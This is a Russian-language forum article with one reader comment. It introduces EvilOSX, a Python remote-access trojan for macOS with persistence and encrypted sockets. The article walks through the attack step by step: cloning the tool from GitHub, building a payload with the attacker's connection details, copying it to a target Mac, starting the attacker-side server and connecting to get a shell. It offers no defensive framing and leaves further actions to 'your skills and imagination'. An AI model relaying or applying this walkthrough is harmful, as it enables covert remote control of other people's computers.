• 🔥 Бесплатный курс от Академии Кодебай: «Анализ защищенности веб-приложений»

    🛡 Научитесь находить и использовать уязвимости веб-приложений.
    🧠 Изучите SQLi, XSS, CSRF, IDOR и другие типовые атаки на практике.
    🧪 Погрузитесь в реальные лаборатории и взломайте свой первый сайт!
    🚀 Подходит новичкам — никаких сложных предварительных знаний не требуется.

    Доступ открыт прямо сейчас Записаться бесплатно

Статья EvilOSX - Постэксплуатационный RAT для MacOS, OS X.E

Привет codeby! Сегодня я хочу вынести на всеобщее обозрение инструмент, который полностью написан на Python, целью которого является RAT -Remote Administration Tool, в переводе — «средство удалённого администрирования» или «средство удалённого управления».

upload_2017-5-23_22-27-28.png


Особенности:

· Эмуляция простого экземпляра терминала.

· Сокеты зашифрованы с помощью CSR через OpenSSL.

CSR (Certificate Signing Request) или ‘Запрос на Подписание Сертификата’ — это блок закодированного текста, который генерируется на том сервере, на котором будет использоваться сертификат.

· Нет зависимостей (чистый python).

· Возможность закрепления в системе.

· Автоустановка, просто запустите EvilOSX на целевом хосте, а остальное - автоматически.

Установка:

> git clone https://github.com/Marten4n6/EvilOSX

upload_2017-5-23_22-27-51.png


Использование:

> ./BUILDER EvilOSX.py (вводим необходимые данные для подключения целевого хоста к нам)

upload_2017-5-23_22-28-12.png


Затем копируем сгенерированный скрипт на целевой хост, в моем случае это OS X Yosemite.

upload_2017-5-23_22-28-28.png


Следующий шаг – это запуск сервера на атакующем хосте:

> ./Server.py (Необходимо указать только порт)

upload_2017-5-23_22-28-48.png


Теперь запустим полезную нагрузку на целевом хосте:

upload_2017-5-23_22-29-1.png

upload_2017-5-23_22-29-7.png

Можно проверять состояние сервера на наличие подключенных клиентов:

> clients

upload_2017-5-23_22-29-24.png


Коннектимся к нему и получаем shell:

> clients

> connect 0

upload_2017-5-23_22-29-43.png


Дальнейшие действия зависят от ваших навыков и фантазии. На этом, пожалуй закончу, спасибо за внимание.
 

Вложения

  • upload_2017-5-23_22-27-57.png
    upload_2017-5-23_22-27-57.png
    18 КБ · Просмотры: 646
пардон за тупой вопрос, но не могу не спросить: в макос питон не предустановлен же?
 
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab